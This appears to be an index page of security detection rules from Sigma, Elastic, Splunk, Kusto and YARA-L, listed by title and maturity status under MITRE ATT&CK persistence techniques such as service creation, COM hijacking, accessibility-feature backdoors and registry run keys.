- Sigma New Service Creation Using Sc.EXE test
- Sigma OilRig APT Activity test
- Sigma OilRig APT Registry Persistence test
- Sigma OilRig APT Schedule Task Persistence - Security test
- Sigma OilRig APT Schedule Task Persistence - System test
- Elastic Persistence via Update Orchestrator Service Hijack production
- Elastic Persistence via WMI Standard Registry Provider production
- Sigma Possible impact of 'SMOKEDHAM backdoor' with MSDTC service privilege escalation via command line production
- Splunk Possible Lateral Movement PowerShell Spawn production
- Sigma Potential CobaltStrike Service Installations - Registry test
- Sigma Potential Persistence Attempt Via Existing Service Tampering test
- Elastic Potential Privilege Escalation via Service ImagePath Modification production
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma ProcessHacker Privilege Elevation test
- Sigma PSEXEC Remote Execution File Artefact test
- Splunk PSexec Service Creation (Windows Event Log)
- Sigma PSexec service installation experimental
- Sigma PUA - Kernel Driver Utility (KDU) Execution experimental
- Splunk Randomly Generated Windows Service Name experimental
- Kusto Rare Process as a Service available
- Sigma RDP session hijack via service creation abuse experimental
- Sigma Remote Access Tool Services Have Been Installed - Security test
- Sigma Remote Access Tool Services Have Been Installed - System test
- Elastic Remote Windows Service Installed production
- Sigma Service abuse with backdoored "command failure" (Reg via command) experimental
- Sigma Service abuse with backdoored "command failure" (Reg via PowerShell) experimental
- Sigma Service abuse with backdoored "command failure" (service) experimental
- Sigma Service abuse with malicious ImagePath (Reg via PowerShell) experimental
- Sigma Service abuse with malicious ImagePath (service) experimental
- Elastic Service Command Lateral Movement production
- Elastic Service Control Spawned via Script Interpreter production
- Sigma Service creation (command) experimental
- Sigma Service creation (PowerShell) experimental
- Elastic Service Creation via Local Kerberos Authentication production
- Elastic Service DACL Modification via sc.exe production
- Sigma Service Installation in Suspicious Folder test
- Sigma Service Installation with Suspicious Folder Pattern test
- Elastic Service Path Modification production
- Sigma Service permissions hijacked for privileges abuse (PowerShell) experimental
- Sigma Service permissions hijacked for privileges abuse (reg via command) experimental
- Sigma Service permissions hijacked for privileges abuse (Reg via PowerShell) experimental
- Sigma Service permissions hijacked for privileges abuse (service) experimental
- Sigma ServiceDll Hijack test
- Splunk Services LOLBAS Execution Process Spawn production
- Sigma Sliver C2 Default Service Installation test
- Sigma StoneDrill Service Install test
- Splunk Suspicious .sys Created - Windows (Sysmon)
- Elastic Suspicious ImagePath Service Creation production
- Sigma Suspicious New Service Creation test
- Elastic Suspicious ScreenConnect Client Child Process production
- Sigma Suspicious Service DACL Modification Via Set-Service Cmdlet test
- Sigma Suspicious Service Installation test
- Sigma Suspicious Service Installation Script test
- Sigma Suspicious Service Path Modification test
- Elastic Suspicious Service was Installed in the System production
- YARA-L Suspicious Windows Service Installation Detected
- Sigma Sysinternals PsService Execution test
- Sigma Sysinternals PsSuspend Execution test
- Elastic System Shells via Services production
- Sigma Turla PNG Dropper Service test
- Sigma Turla Service Install test
- Sigma Uncommon Service Installation Image Path test
- Elastic Unsigned DLL Loaded by Svchost production
- Elastic Unusual Persistence via Services Registry production
- Sigma Vulnerable Driver Load test
- Sigma Vulnerable Driver Load By Name test
- Sigma Vulnerable HackSys Extreme Vulnerable Driver Load test
- Sigma Vulnerable WinRing0 Driver Load test
- Splunk Windows Bluetooth Service Installed From Uncommon Location production
- Splunk Windows KrbRelayUp Service Creation production
- Splunk Windows Remote Create Service production
- Splunk Windows Service Create Kernel Mode Driver production
- Splunk Windows Service Create RemComSvc production
- Splunk Windows Service Create with Tscon production
- Splunk Windows Service Creation on Remote Endpoint production
- Splunk Windows Service Initiation on Remote Endpoint production
- Elastic Windows Service Installed via an Unusual Client production
- Splunk Windows Suspicious Driver Loaded Path production
- Splunk Windows Vulnerable Driver Installed production
- Splunk Windows Vulnerable Driver Loaded production
- Splunk XMRIG Driver Loaded production
Create or Modify System Process: Launch Daemon T1543.004 1 rule
- Sigma Atomic MacOS Stealer - Persistence Indicators experimental
Event Triggered Execution T1546 139 rules
- Splunk Access Common Package Config file (EDR)
- Splunk Access Common Package Config file (PowerShell)
- Splunk Access Common Package Config file (Sysmon)
- Splunk Access Common Package Config file (Windows Event Log)
- Sigma AdminSDHolder permissions changed for persistence experimental
- Kusto Caramel Tsunami Actor IOC - July 2021 available
- Sigma Change Default File Association To Executable Via Assoc test
- Sigma Change Default File Association Via Assoc test
- Sigma COM Hijack via Sdclt test
- Sigma COM Hijacking via TreatAs test
- Sigma COM Object Hijacking Via Modification Of Default System CLSID Default Value experimental
- Splunk Command Line Utility Added to Accessibility Features (PowerShell)
- Splunk Command Line Utility Added to Accessibility Features (Sysmon)
- Splunk Command Line Utility Added to Accessibility Features (Windows Event Log)
- Elastic Component Object Model Hijacking production
- Kusto Component Object Model Hijacking - Vault7 trick available
- Sigma Control Panel Items test
- Splunk Detect WMI Event Subscription Persistence production
- Sigma HAFNIUM Exchange Exploitation Activity test
- Elastic Image File Execution Options Injection production
- Elastic Installation of Custom Shim Databases production
- Kusto Modification of Accessibility Features
- Elastic Mofcomp Activity production
- Sigma MSSQL Extended Stored Procedure Backdoor Maggie test
- Elastic Netsh Helper DLL production
- Sigma Netsh helper DLL abuse (process) experimental
- Sigma Netsh helper DLL abuse (Reg via Sysmon) experimental
- Sigma New ActiveScriptEventConsumer Created Via Wmic.EXE test
- Sigma New DLL Added to AppCertDlls Registry Key test
- Sigma New DLL Added to AppInit_DLLs Registry Key test
- Sigma New Netsh Helper DLL Registered From A Suspicious Location test
- Sigma New Outlook Macro Created test
- Sigma Outlook Macro Execution Without Warning Setting Enabled test
- Splunk Overwriting Accessibility Binaries production
- Sigma Path To Screensaver Binary Modified test
- Sigma Persistence Via Sticky Key Backdoor test
- Elastic Persistence via WMI Event Subscription production
- Elastic Potential Application Shimming via Sdbinst production
- Sigma Potential COM Object Hijacking Via TreatAs Subkey - Registry test
- Elastic Potential Modification of Accessibility Binaries production
- Sigma Potential Persistence Using DebugPath test
- Sigma Potential Persistence Via App Paths Default Property test
- Sigma Potential Persistence Via AppCompat RegisterAppRestart Layer test
- Sigma Potential Persistence Via GlobalFlags test
- Sigma Potential Persistence Via Netsh Helper DLL test
- Sigma Potential Persistence Via Netsh Helper DLL - Registry test
- Sigma Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting test
- Sigma Potential Persistence Via PowerShell User Profile Using Add-Content test
- Sigma Potential Persistence Via Scrobj.dll COM Hijacking test
- Sigma Potential Persistence Via Shim Database In Uncommon Location test
- Sigma Potential Persistence Via Shim Database Modification test
- Sigma Potential Privilege Escalation Using Symlink Between Osk and Cmd test
- Sigma Potential PSFactoryBuffer COM Hijacking test
- Sigma Potential Remote WMI ActiveScriptEventConsumers Activity test
- Elastic Potential RemoteMonologue Attack production
- Sigma Potential Shim Database Persistence via Sdbinst.EXE test
- Sigma Potential Suspicious Activity Using SeCEdit test
- Splunk Powershell COM Hijacking InprocServer32 Modification production
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Splunk Powershell Execute COM Object production
- Sigma PowerShell Profile Modification test
- Sigma Powershell WMI Persistence test
- Splunk Registry Keys for Creating SHIM Databases production
- Splunk Registry Keys Used For Privilege Escalation production
- Sigma Registry Modification of MS-settings Protocol Handler test
- Elastic Registry Persistence via AppCert DLL production
- Kusto Registry Persistence via AppCert DLL Modification available
- Elastic Registry Persistence via AppInit DLL production
- Kusto Registry Persistence via AppInit DLLs Modification available
- Sigma Rundll32 Registered COM Objects test
- Splunk Rundll32 Spawned by Disk Cleanup (Sysmon)
- Splunk Rundll32 Spawned by Disk Cleanup (Windows Event Log)
- Splunk Screensaver Event Trigger Execution production
- Sigma Session Manager Autorun Keys Modification test
- Sigma Shell Open Registry Keys Manipulation test
- Splunk Shim Database File Creation production
- Splunk Shim Database Installation With Suspicious Parameters production
- Sigma SOURGUM Actor Behaviours test
- Sigma Stickey key called CMD via command execution experimental
- Sigma Stickey key called CMD via command execution (hash detection) experimental
- Sigma Stickey key IFEO (Reg via command) experimental
- Sigma Stickey key IFEO registry changed (Reg via Sysmon) experimental
- Sigma Sticky key file created from CMD copy experimental
- Sigma Sticky Key Like Backdoor Execution test
- Sigma Sticky Key Like Backdoor Usage - Registry test
- Sigma Sticky key sethc command for replacement by CMD experimental
- Sigma Sticky key sethc file failed replacement experimental
- Kusto SUNBURST and SUPERNOVA backdoor hashes available
- Kusto SUNBURST and SUPERNOVA backdoor hashes (Normalized File Events)
- Kusto SUNBURST network beacons available
- Sigma Suspicious Debugger Registration Cmdline test
- Splunk Suspicious DLLhost Execution (EDR)
- Splunk Suspicious DLLhost Execution (PowerShell)
- Splunk Suspicious DLLhost Execution (Windows Event Log)
- Sigma Suspicious Encoded Scripts in a WMI Consumer test
- Splunk Suspicious Execution of Accessibility Tool Debuggers (Sysmon)
- Splunk Suspicious Execution of Accessibility Tool Debuggers (Windows Event Log)
- Sigma Suspicious Get-Variable.exe Creation test
- Sigma Suspicious GetTypeFromCLSID ShellExecute test
- Splunk Suspicious InprocServer32 Registry Modification (Sysmon)
- Splunk Suspicious InprocServer32 Registry Modification (Windows Event Log)
- Sigma Suspicious Outlook Macro Created test
- Splunk Suspicious Registry Key Created (PowerShell)
- Splunk Suspicious Registry Key Created (Windows Event Log)
- Sigma Suspicious ScreenSave Change by Reg.exe test
- Sigma Suspicious Screensaver Binary File Creation test
- Sigma Suspicious Shell Open Command Registry Modification experimental
- Sigma Suspicious Shim Database Patching Activity test
- Elastic Suspicious WerFault Child Process production
- Elastic Suspicious WMI Event Subscription Created production
- Sigma System crash behavior manipulation - WMImplant (registry) experimental
- Sigma Uncommon Extension Shim Database Installation Via Sdbinst.EXE test
- Elastic Uncommon Registry Persistence Change production
- Sigma VsCode Powershell Profile Modification test
- Elastic Werfault ReflectDebugger Persistence production
- Splunk Windows AD AdminSDHolder ACL Modified production
- Splunk Windows AppCertDLL Modification Via Command Line production
- Splunk Windows Change File Association Command To Notepad production
- Splunk Windows COM Hijacking InprocServer32 Modification production
- Splunk Windows Compatibility Telemetry Suspicious Child Process production
- Splunk Windows Compatibility Telemetry Tampering Through Registry production
- Splunk Windows Event Triggered Image File Execution Options Injection production
- Splunk Windows MOF Event Triggered Execution via WMI production
- Splunk Windows New Default File Association Value Set production
- Sigma WMI ActiveScriptEventConsumers Activity Via Scrcons.EXE DLL Load test
- Sigma WMI Backdoor Exchange Transport Agent test
- Sigma WMI Event Subscription test
- Splunk WMI Permanent Event Subscription - Sysmon production
- Sigma WMI Persistence test
- Sigma WMI Persistence - Command Line Event Consumer test
- Sigma WMI Persistence - Script Event Consumer test
- Sigma WMI Persistence - Script Event Consumer File Write test
- Sigma WMI Persistence - Security test
- Sigma WMI registration experimental
- Sigma WMI registration (PowerShell) experimental
- Splunk WMI subscription execution (Sysmon)
- Splunk WMI subscription execution (Windows Event Log)
- Sigma Writing Local Admin Share test
- Kusto Zinc Actor IOCs files - October 2022 available
Event Triggered Execution: Change Default File Association T1546.001 7 rules
- Sigma Change Default File Association To Executable Via Assoc test
- Sigma Change Default File Association Via Assoc test
- Sigma Registry Modification of MS-settings Protocol Handler test
- Sigma Shell Open Registry Keys Manipulation test
- Sigma Suspicious Shell Open Command Registry Modification experimental
- Splunk Windows Change File Association Command To Notepad production
- Splunk Windows New Default File Association Value Set production
Event Triggered Execution: Screensaver T1546.002 6 rules
- Sigma Path To Screensaver Binary Modified test
- Splunk Screensaver Event Trigger Execution production
- Sigma Suspicious ScreenSave Change by Reg.exe test
- Sigma Suspicious Screensaver Binary File Creation test
- Elastic Uncommon Registry Persistence Change production
- Sigma Writing Local Admin Share test
Event Triggered Execution: Windows Management Instrumentation Event Subscription T1546.003 23 rules
- Splunk Detect WMI Event Subscription Persistence production
- Elastic Mofcomp Activity production
- Sigma New ActiveScriptEventConsumer Created Via Wmic.EXE test
- Elastic Persistence via WMI Event Subscription production
- Sigma Potential Remote WMI ActiveScriptEventConsumers Activity test
- Sigma Powershell WMI Persistence test
- Sigma Suspicious Encoded Scripts in a WMI Consumer test
- Elastic Suspicious WMI Event Subscription Created production
- Sigma System crash behavior manipulation - WMImplant (registry) experimental
- Splunk Windows MOF Event Triggered Execution via WMI production
- Sigma WMI ActiveScriptEventConsumers Activity Via Scrcons.EXE DLL Load test
- Sigma WMI Backdoor Exchange Transport Agent test
- Sigma WMI Event Subscription test
- Splunk WMI Permanent Event Subscription - Sysmon production
- Sigma WMI Persistence test
- Sigma WMI Persistence - Command Line Event Consumer test
- Sigma WMI Persistence - Script Event Consumer test
- Sigma WMI Persistence - Script Event Consumer File Write test
- Sigma WMI Persistence - Security test
- Sigma WMI registration experimental
- Sigma WMI registration (PowerShell) experimental
- Splunk WMI subscription execution (Sysmon)
- Splunk WMI subscription execution (Windows Event Log)
Event Triggered Execution: Netsh Helper DLL T1546.007 7 rules
- Elastic Netsh Helper DLL production
- Sigma Netsh helper DLL abuse (process) experimental
- Sigma Netsh helper DLL abuse (Reg via Sysmon) experimental
- Sigma New Netsh Helper DLL Registered From A Suspicious Location test
- Sigma Potential Persistence Via Netsh Helper DLL test
- Sigma Potential Persistence Via Netsh Helper DLL - Registry test
- Sigma Potential Suspicious Activity Using SeCEdit test
Event Triggered Execution: Accessibility Features T1546.008 22 rules
- Splunk Command Line Utility Added to Accessibility Features (PowerShell)
- Splunk Command Line Utility Added to Accessibility Features (Sysmon)
- Splunk Command Line Utility Added to Accessibility Features (Windows Event Log)
- Kusto Modification of Accessibility Features
- Splunk Overwriting Accessibility Binaries production
- Sigma Persistence Via Sticky Key Backdoor test
- Elastic Potential Modification of Accessibility Binaries production
- Sigma Potential Privilege Escalation Using Symlink Between Osk and Cmd test
- Sigma Potential Suspicious Activity Using SeCEdit test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma Stickey key called CMD via command execution experimental
- Sigma Stickey key called CMD via command execution (hash detection) experimental
- Sigma Stickey key IFEO (Reg via command) experimental
- Sigma Stickey key IFEO registry changed (Reg via Sysmon) experimental
- Sigma Sticky key file created from CMD copy experimental
- Sigma Sticky Key Like Backdoor Execution test
- Sigma Sticky Key Like Backdoor Usage - Registry test
- Sigma Sticky key sethc command for replacement by CMD experimental
- Sigma Sticky key sethc file failed replacement experimental
- Sigma Suspicious Debugger Registration Cmdline test
- Splunk Suspicious Execution of Accessibility Tool Debuggers (Sysmon)
- Splunk Suspicious Execution of Accessibility Tool Debuggers (Windows Event Log)
Event Triggered Execution: AppCert DLLs T1546.009 5 rules
- Sigma New DLL Added to AppCertDlls Registry Key test
- Elastic Registry Persistence via AppCert DLL production
- Kusto Registry Persistence via AppCert DLL Modification available
- Sigma Session Manager Autorun Keys Modification test
- Splunk Windows AppCertDLL Modification Via Command Line production
Event Triggered Execution: AppInit DLLs T1546.010 3 rules
- Sigma New DLL Added to AppInit_DLLs Registry Key test
- Elastic Registry Persistence via AppInit DLL production
- Kusto Registry Persistence via AppInit DLLs Modification available
Event Triggered Execution: Application Shimming T1546.011 11 rules
- Elastic Installation of Custom Shim Databases production
- Elastic Potential Application Shimming via Sdbinst production
- Sigma Potential Persistence Via AppCompat RegisterAppRestart Layer test
- Sigma Potential Persistence Via Shim Database In Uncommon Location test
- Sigma Potential Persistence Via Shim Database Modification test
- Sigma Potential Shim Database Persistence via Sdbinst.EXE test
- Splunk Registry Keys for Creating SHIM Databases production
- Splunk Shim Database File Creation production
- Splunk Shim Database Installation With Suspicious Parameters production
- Sigma Suspicious Shim Database Patching Activity test
- Sigma Uncommon Extension Shim Database Installation Via Sdbinst.EXE test
Event Triggered Execution: Image File Execution Options Injection T1546.012 10 rules
- Elastic Image File Execution Options Injection production
- Sigma Potential Persistence Via App Paths Default Property test
- Sigma Potential Persistence Via GlobalFlags test
- Splunk Registry Keys Used For Privilege Escalation production
- Splunk Suspicious Registry Key Created (PowerShell)
- Splunk Suspicious Registry Key Created (Windows Event Log)
- Elastic Suspicious WerFault Child Process production
- Elastic Uncommon Registry Persistence Change production
- Elastic Werfault ReflectDebugger Persistence production
- Splunk Windows Event Triggered Image File Execution Options Injection production
Event Triggered Execution: Component Object Model Hijacking T1546.015 22 rules
- Sigma COM Hijacking via TreatAs test
- Sigma COM Object Hijacking Via Modification Of Default System CLSID Default Value experimental
- Elastic Component Object Model Hijacking production
- Kusto Component Object Model Hijacking - Vault7 trick available
- Sigma Potential COM Object Hijacking Via TreatAs Subkey - Registry test
- Sigma Potential Persistence Using DebugPath test
- Sigma Potential Persistence Via Scrobj.dll COM Hijacking test
- Sigma Potential PSFactoryBuffer COM Hijacking test
- Elastic Potential RemoteMonologue Attack production
- Splunk Powershell COM Hijacking InprocServer32 Modification production
- Splunk Powershell Execute COM Object production
- Sigma Rundll32 Registered COM Objects test
- Splunk Rundll32 Spawned by Disk Cleanup (Sysmon)
- Splunk Rundll32 Spawned by Disk Cleanup (Windows Event Log)
- Sigma SOURGUM Actor Behaviours test
- Splunk Suspicious DLLhost Execution (EDR)
- Splunk Suspicious DLLhost Execution (PowerShell)
- Splunk Suspicious DLLhost Execution (Windows Event Log)
- Sigma Suspicious GetTypeFromCLSID ShellExecute test
- Splunk Suspicious InprocServer32 Registry Modification (Sysmon)
- Splunk Suspicious InprocServer32 Registry Modification (Windows Event Log)
- Splunk Windows COM Hijacking InprocServer32 Modification production
Boot or Logon Autostart Execution T1547 154 rules
- Splunk Active Setup Registry Autostart production
- Splunk Add DLL_EXE Registry Value (Sysmon)
- Sigma Add Port Monitor Persistence in Registry test
- Splunk Additional dll added to Spool Driver (Sysmon)
- Splunk Additional dll added to Spool Driver (Windows Event Log)
- Sigma Atbroker Registry Change test
- Sigma Bypass UAC Using Event Viewer test
- Sigma Classes Autorun Keys Modification test
- Sigma Common Autorun Keys Modification test
- Sigma Creation Exe for Service with Unquoted Path test
- Sigma CurrentControlSet Autorun Keys Modification test
- YARA-L CurrentControlSet Autorun Keys Modification
- Sigma CurrentVersion Autorun Keys Modification test
- YARA-L CurrentVersion Autorun Keys Modification
- Sigma CurrentVersion NT Autorun Keys Modification test
- Sigma Default RDP Port Changed to Non Standard Port test
- YARA-L Default RDP Port Changed to Non Standard Port
- Sigma Desktop.INI Created by Uncommon Process test
- Kusto Detect Print Processors Registry Driver Key Creation/Modification available
- Kusto Detect Registry Run Key Creation/Modification available
- Sigma Direct Autorun Keys Modification test
- YARA-L Direct Autorun Keys Modification
- Sigma DLL Load via LSASS test
- Splunk Execution from Startup Folder (Sysmon)
- Splunk Execution from Startup Folder (Windows Event Log)
- Elastic Execution of Persistent Suspicious Program production
- Sigma File Creation In Suspicious Directory By Msdt.EXE test
- Splunk File Written to Startup Folder - Windows (Sysmon)
- Splunk File Written to Startup Folder - Windows (Windows Event Log)
- Sigma Forest Blizzard APT - Custom Protocol Handler Creation test
- Sigma Forest Blizzard APT - Custom Protocol Handler DLL Registry Set test
- Kusto Imminent Ransomware available
- Elastic Installation of Security Support Provider production
- Sigma Internet Explorer Autorun Keys Modification test
- Sigma Kapeka Backdoor Autorun Persistence test
- Elastic Lateral Movement via Startup Folder production
- Sigma Leviathan Registry Key Activity test
- Splunk LSA Authentication Packages Registry Key Modified (PowerShell)
- Splunk LSA Authentication Packages Registry Key Modified (Sysmon)
- Splunk LSA Authentication Packages Registry Key Modified (Windows Event Log)
- Kusto Midnight Blizzard - suspicious rundll32.exe execution of vbscript
- Kusto Midnight Blizzard - suspicious rundll32.exe execution of vbscript (Normalized Process Events)
- Sigma Modify User Shell Folders Startup Value test
- YARA-L Modify User Shell Folders Startup Value
- Splunk Monitor Registry Keys for Print Monitors production
- Sigma Narrator's Feedback-Hub Persistence test
- Splunk New AutoRun Registry Key (PowerShell)
- Sigma New Custom Shim Database Created test
- Sigma New RUN Key Pointing to Suspicious Folder experimental
- YARA-L New RUN Key Pointing to Suspicious Folder
- Sigma New TimeProviders Registered With Uncommon DLL Name test
- Sigma NTFS hard link creation experimental
- Sigma NTFS symbolic link configuration change experimental
- Sigma NTFS symbolic link creation experimental
- Sigma Office Autorun Keys Modification test
- Elastic Persistence via a Windows Installer production
- Elastic Persistence via Hidden Run Key Detected production
- Elastic Persistence via WMI Standard Registry Provider production
- Sigma Potential KamiKakaBot Activity - Winlogon Shell Persistence test
- Elastic Potential LSA Authentication Package Abuse production
- Splunk Potential LSA password filter (PowerShell)
- Splunk Potential LSA password filter (Windows Event Log)
- Sigma Potential Persistence Attempt Via Run Keys Using Reg.EXE test
- Elastic Potential Persistence via Mandatory User Profile production
- Elastic Potential Persistence via Time Provider Modification production
- Elastic Potential Port Monitor or Print Processor Registration Abuse production
- Splunk Potential Proxy Malware via AutoRun Key (PowerShell)
- Splunk Potential Proxy Malware via AutoRun Key (Sysmon)
- Splunk Potential Proxy Malware via AutoRun Key (Windows Event Log)
- Elastic Potential REMCOS Trojan Execution production
- Sigma Potential RipZip Attack on Startup Folder test
- Sigma Potential Ryuk Ransomware Activity stable
- Sigma Potential Startup Shortcut Persistence Via PowerShell.EXE test
- Sigma Potential Suspicious Activity Using SeCEdit test
- YARA-L Potential Suspicious Activity Using SeCEdit
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Splunk Print Processor Registry Autostart production
- Splunk Print Spooler Adding A Printer Driver production
- Splunk Print Spooler Failed to Load a Plug-in production
- Sigma Print spooler privilege escalation via printer added (CVE-2020-1048) experimental
- Splunk Rare dll called by Spoolsv.exe (Windows Event Log)
- Splunk Registry Keys Used For Persistence production
- Sigma Registry Persistence Mechanisms in Recycle Bin test
- Sigma Registry Persistence via Explorer Run Key test
- Kusto Registry Run Keys - Suspicious Registry Run Keys
- Sigma Registry Set With Crypto-Classes From The "Cryptography" PowerShell Namespace test
- Sigma Security package (SSP) added (Reg via command) experimental
- Sigma Security package (SSP) loaded into LSA (native) experimental
- Sigma Security Support Provider (SSP) Added to LSA Configuration test
- Sigma Session Manager Autorun Keys Modification test
- YARA-L Session Manager Autorun Keys Modification
- Splunk Shortcut Created in Startup Folder - Windows (PowerShell)
- Splunk Spoolsv Spawning Rundll32 production
- Splunk Spoolsv Suspicious Loaded Modules production
- Splunk Spoolsv Writing a DLL production
- Splunk Spoolsv Writing a DLL - Sysmon production
- Sigma Startup Folder File Write test
- Splunk Startup Folder Location Modified - Windows (PowerShell)
- Splunk Startup Folder Location Modified - Windows (Sysmon)
- Splunk Startup Folder Location Modified - Windows (Windows Event Log)
- Elastic Startup Folder Persistence via Unsigned Process production
- Elastic Startup or Run Key Registry Modification production
- Sigma Startup/Logon Script Added to Group Policy Object test
- Elastic Startup/Logon Script added to Group Policy Object production
- Sigma Suspicious Autorun Registry Modified via WMI experimental
- Sigma Suspicious Driver Install by pnputil.exe test
- Sigma Suspicious GrpConv Execution test
- Elastic Suspicious Module Loaded by LSASS production
- Sigma Suspicious PowerShell In Registry Run Keys test
- YARA-L Suspicious Powershell In Registry Run Keys
- Splunk Suspicious Registry Key Created (PowerShell)
- Splunk Suspicious Registry Key Created (Windows Event Log)
- Sigma Suspicious Run Key from Download test
- Sigma Suspicious Startup Folder Persistence test
- Elastic Suspicious Startup Shell Folder Modification production
- Sigma Suspicious VBScript UN2452 Pattern test
- Splunk Symbolic OR Hard File Link Created (PowerShell)
- Splunk Symbolic OR Hard File Link Created (Windows Event Log)
- Sigma System Scripts Autorun Keys Modification test
- Sigma SystemNightmare by GentilKiwi - External printer mapped (CVE-2021-1675 / CVE-2021-34527) experimental
- Sigma SystemNightmare by GentilKiwi - New external device added (CVE-2021-1675 / CVE-2021-34527) experimental
- Splunk Time Provider Persistence Registry production
- Elastic Uncommon Registry Persistence Change production
- Splunk Unusual winlogon.exe Child Process (Sysmon)
- Splunk Unusual winlogon.exe Child Process (Windows Event Log)
- Sigma User Shell Folders Registry Modification via CommandLine experimental
- Sigma VBScript Payload Stored in Registry test
- Splunk Windows Audit Policy Auditing Option Modified - Registry production
- Splunk Windows Autostart Execution LSASS Driver Registry Modification production
- Splunk Windows Boot or Logon Autostart Execution In Startup Folder production
- Sigma Windows Event Log Access Tampering Via Registry experimental
- Sigma Windows Network Access Suspicious desktop.ini Action test
- Splunk Windows NorthStar C2 Agent Execution production
- Splunk Windows PowerShell MSIX Package Installation production
- Splunk Windows Registry BootExecute Modification production
- Splunk Windows Registry Modification for Safe Mode Persistence production
- Splunk Windows Security Support Provider Reg Query production
- Splunk Windows Snake Malware Kernel Driver Comadmin production
- Splunk Windows Snake Malware Service Create production
- Sigma Windows Terminal Profile Settings Modification By Uncommon Process test
- Splunk Windows Unsigned MS DLL Side-Loading production
- Sigma WINEKEY Registry Modification test
- Sigma Winlogon Helper DLL test
- Sigma Winlogon Notify Key Logon Persistence test
- Splunk WinLogon Registry Key Modified (PowerShell)
- Splunk WinLogon Registry Key Modified (Sysmon)
- Sigma WinRAR Creating Files in Startup Locations experimental
- Sigma WinSock2 Autorun Keys Modification test
- Sigma Wow6432Node Classes Autorun Keys Modification test
- Splunk Wow6432Node Classes Autorun Keys Modification (PowerShell)
- Splunk Wow6432Node Classes Autorun Keys Modification (Sysmon)
- Splunk Wow6432Node Classes Autorun Keys Modification (Windows Event Log)
- Sigma Wow6432Node CurrentVersion Autorun Keys Modification test
- Sigma Wow6432Node Windows NT CurrentVersion Autorun Keys Modification test
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder T1547.001 84 rules
- Splunk Add DLL_EXE Registry Value (Sysmon)
- Sigma Classes Autorun Keys Modification test
- Sigma Common Autorun Keys Modification test
- Sigma CurrentControlSet Autorun Keys Modification test
- YARA-L CurrentControlSet Autorun Keys Modification
- Sigma CurrentVersion Autorun Keys Modification test
- YARA-L CurrentVersion Autorun Keys Modification
- Sigma CurrentVersion NT Autorun Keys Modification test
- Sigma Direct Autorun Keys Modification test
- YARA-L Direct Autorun Keys Modification
- Splunk Execution from Startup Folder (Sysmon)
- Splunk Execution from Startup Folder (Windows Event Log)
- Elastic Execution of Persistent Suspicious Program production
- Sigma File Creation In Suspicious Directory By Msdt.EXE test
- Splunk File Written to Startup Folder - Windows (Sysmon)
- Splunk File Written to Startup Folder - Windows (Windows Event Log)
- Sigma Forest Blizzard APT - Custom Protocol Handler Creation test
- Sigma Forest Blizzard APT - Custom Protocol Handler DLL Registry Set test
- Sigma Internet Explorer Autorun Keys Modification test
- Sigma Kapeka Backdoor Autorun Persistence test
- Elastic Lateral Movement via Startup Folder production
- Sigma Leviathan Registry Key Activity test
- Sigma Modify User Shell Folders Startup Value test
- YARA-L Modify User Shell Folders Startup Value
- Sigma Narrator's Feedback-Hub Persistence test
- Splunk New AutoRun Registry Key (PowerShell)
- Sigma New RUN Key Pointing to Suspicious Folder experimental
- YARA-L New RUN Key Pointing to Suspicious Folder
- Sigma Office Autorun Keys Modification test
- Elastic Persistence via a Windows Installer production
- Elastic Persistence via Hidden Run Key Detected production
- Elastic Persistence via WMI Standard Registry Provider production
- Sigma Potential KamiKakaBot Activity - Winlogon Shell Persistence test
- Sigma Potential Persistence Attempt Via Run Keys Using Reg.EXE test
- Elastic Potential Persistence via Mandatory User Profile production
- Splunk Potential Proxy Malware via AutoRun Key (PowerShell)
- Splunk Potential Proxy Malware via AutoRun Key (Sysmon)
- Splunk Potential Proxy Malware via AutoRun Key (Windows Event Log)
- Elastic Potential REMCOS Trojan Execution production
- Sigma Potential Ryuk Ransomware Activity stable
- Sigma Potential Startup Shortcut Persistence Via PowerShell.EXE test
- Sigma Potential Suspicious Activity Using SeCEdit test
- YARA-L Potential Suspicious Activity Using SeCEdit
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Splunk Registry Keys Used For Persistence production
- Sigma Registry Persistence via Explorer Run Key test
- Kusto Registry Run Keys - Suspicious Registry Run Keys
- Sigma Registry Set With Crypto-Classes From The "Cryptography" PowerShell Namespace test
- Sigma Session Manager Autorun Keys Modification test
- YARA-L Session Manager Autorun Keys Modification
- Splunk Shortcut Created in Startup Folder - Windows (PowerShell)
- Sigma Startup Folder File Write test
- Splunk Startup Folder Location Modified - Windows (PowerShell)
- Splunk Startup Folder Location Modified - Windows (Sysmon)
- Splunk Startup Folder Location Modified - Windows (Windows Event Log)
- Elastic Startup Folder Persistence via Unsigned Process production
- Elastic Startup or Run Key Registry Modification production
- Sigma Suspicious Autorun Registry Modified via WMI experimental
- Sigma Suspicious PowerShell In Registry Run Keys test
- YARA-L Suspicious Powershell In Registry Run Keys
- Splunk Suspicious Registry Key Created (PowerShell)
- Splunk Suspicious Registry Key Created (Windows Event Log)
- Sigma Suspicious Run Key from Download test
- Sigma Suspicious Startup Folder Persistence test
- Elastic Suspicious Startup Shell Folder Modification production
- Sigma Suspicious VBScript UN2452 Pattern test
- Sigma System Scripts Autorun Keys Modification test
- Elastic Uncommon Registry Persistence Change production
- Sigma User Shell Folders Registry Modification via CommandLine experimental
- Sigma VBScript Payload Stored in Registry test
- Splunk Windows Boot or Logon Autostart Execution In Startup Folder production
- Sigma Windows Event Log Access Tampering Via Registry experimental
- Splunk Windows NorthStar C2 Agent Execution production
- Splunk Windows PowerShell MSIX Package Installation production
- Splunk Windows Registry BootExecute Modification production
- Splunk Windows Registry Modification for Safe Mode Persistence production
- Sigma WinRAR Creating Files in Startup Locations experimental
- Sigma WinSock2 Autorun Keys Modification test
- Sigma Wow6432Node Classes Autorun Keys Modification test
- Splunk Wow6432Node Classes Autorun Keys Modification (PowerShell)
- Splunk Wow6432Node Classes Autorun Keys Modification (Sysmon)
- Splunk Wow6432Node Classes Autorun Keys Modification (Windows Event Log)
- Sigma Wow6432Node CurrentVersion Autorun Keys Modification test
- Sigma Wow6432Node Windows NT CurrentVersion Autorun Keys Modification test
Boot or Logon Autostart Execution: Authentication Package T1547.002 7 rules
- Splunk LSA Authentication Packages Registry Key Modified (PowerShell)
- Splunk LSA Authentication Packages Registry Key Modified (Sysmon)
- Splunk LSA Authentication Packages Registry Key Modified (Windows Event Log)
